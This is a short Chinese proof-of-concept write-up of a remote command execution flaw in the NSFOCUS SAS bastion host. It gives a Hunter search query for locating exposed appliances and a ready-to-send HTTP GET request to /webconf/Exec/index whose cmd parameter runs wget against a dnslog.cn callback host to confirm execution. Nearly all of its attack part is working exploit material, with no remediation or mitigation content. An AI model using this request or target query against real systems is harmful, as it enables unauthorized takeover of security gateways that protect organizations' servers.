绿盟 SAS堡垒机 Exec 远程命令执行漏洞
一、漏洞执行
绿盟 SAS堡垒机 Exec 远程命令执行漏洞,攻击者可通过该漏洞获取服务器控制权限。
二、影响版本
- 绿盟SAS堡垒机
三、资产测绘
- hunter
app.name="NSFOCUS 绿盟 SAS"
- 登录页面
四、漏洞复现
GET /webconf/Exec/index?cmd=wget%200nicnk.dnslog.cn HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close
